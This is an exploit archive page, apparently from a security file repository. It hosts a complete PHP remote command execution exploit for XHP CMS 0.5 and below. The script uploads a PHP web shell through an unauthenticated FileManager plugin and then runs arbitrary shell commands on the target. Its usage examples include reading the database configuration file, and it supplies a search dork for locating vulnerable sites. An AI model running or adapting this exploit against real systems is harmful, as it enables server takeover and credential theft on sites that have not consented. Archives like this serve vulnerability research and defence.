XHP_CMS_05_xpl.html

XHP_CMS_05_xpl.html: Posted Apr 1, 2006; Authored by rgod | Site retrogod.altervista.org; XHP CMS versions 0.5 and below remote command execution exploit.; tags | exploit, remote; SHA-256 | 62549727aeb01656ba3d3a5d5e73937424bcd3276cb0694970800cd270c003c7; Download | Favorite | View

XHP_CMS_05_xpl.html

<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-string">#!/usr/bin/php -q -d short_open_tag=on
<?
echo "XHP CMS <= 0.5 remote cmmnds xctn\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n\r\n";

echo "dork: \"powered by XHP CMS\"\r\n\r\n";

if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host:      target server (ip/hostname)\r\n";
echo "path:      path to XHP\r\n";
echo "cmd:       a shell command\r\n";
echo "Options:\r\n";
echo "   -p[port]:    specify a port other than 80\r\n";
echo "   -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /xhp/ cat ./../dbconfig.php\r\n";
echo "php ".$argv[0]." localhost /xhp/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}

/* explaination:
 without to have admin rights, you can have access to FileManager plugin
 to upload php files:

 http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/manager.php

 or

 http://[target]/[path_to_xhp]/inc/htmlarea/plugins/FileManager/standalonemanager.php

 after, you can launch commands from them, ex:

 http://[target]/[path]/filemanager/suntzu.php?cmd=cat%20./../dbconfig.php

                        */
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result='';$exa='';$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
 return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy=='') {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo 'No response from '.$host.':'.$port; die;
    }
  }
  else {
  $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo 'Not a valid proxy...';die;
    }
    $parts=explode(':',$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo 'No response from proxy...';die;
  }
  }
  fputs($ock,$packet);
  if ($proxy=='') {
    $html='';
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html='';
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
  #debug
  #echo "\r\n".$html;
}

function make_seed()
{
   list($usec, $sec) = explode(' ', microtime());
   return (float) $sec + ((float) $usec * 100000);
}

$host=$argv[1];
$path=$argv[2];
$action=$argv[3];
$cmd="";$port=80;$proxy="";

for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
  $port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
  $proxy=str_replace("-P","",$argv[$i]);
}
}
$cmd=urlencode($cmd);

if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}


srand(make_seed());
$anumber = rand(1,99999);

   echo "[1] Uploading a shell...\r\n";
$data='-----------------------------7d61592213049c
Content-Disposition: form-data; name="dir"

/
-----------------------------7d61592213049c
Content-Disposition: form-data; name="upload"; filename="suntzu'.$anumber.'.php"
Content-Type: text/plain

<?php
if (get_magic_quotes_gpc()){$_GET[cmd]=stripslashes($_GET[cmd]);}
ini_set("max_execution_time",0);
echo "*delim*";
passthru($_GET[cmd]);
echo "*delim*";
?>
-----------------------------7d61592213049c
Content-Disposition: form-data; name="submit"

Upload
-----------------------------7d61592213049c--
';
  $packet="POST ".$p."inc/htmlarea/plugins/FileManager/images.php HTTP/1.0\r\n";
  $packet.="Content-Type: multipart/form-data; boundary=---------------------------7d61592213049c\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Content-Length: ".strlen($data)."\r\n";
  $packet.="Connection: close\r\n\r\n";
  $packet.=$data;
  #echo quick_dump($packet);
  sendpacketii($packet);
  sleep(1);
  echo "[2] Launch commands...\r\n";
  $packet="GET ".$p."filemanager/suntzu".$anumber.".php?cmd=".$cmd." HTTP/1.0\r\n";
  $packet.="Host: ".$host."\r\n";
  $packet.="Connection: Close\r\n\r\n";
  #echo quick_dump($packet);
  sendpacketii($packet);
  if (strstr($html,"*delim*"))
  {
  echo "Exploit succeeded...\r\n\r\n";
  $temp=explode("*delim*",$html);
  echo $temp[1];
  }
  else
  {echo "Exploit failed...\r\n";}
?>






</span></span>
</code></pre>

Top Authors In Last 30 Days

Red Hat 202 files
Ubuntu 76 files
Debian 24 files
Ahmet Umit Bayram 6 files
Gentoo 5 files
Amit Roy 4 files
ron190 4 files
Furkan Eren Tetik 4 files
Google Security Research 3 files
Jann Horn 3 files

File Archives

Systems

AIX (429)
Apple (2,089)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,072)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,505)
HPUX (880)
iOS (376)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (50,147)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (16,149)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,606)
UNIX (9,422)
UnixWare (187)
Windows (6,665)
Other

XHP_CMS_05_xpl.html

XHP_CMS_05_xpl.html

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

XHP_CMS_05_xpl.html

Share This

XHP_CMS_05_xpl.html

File Archive:

June 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems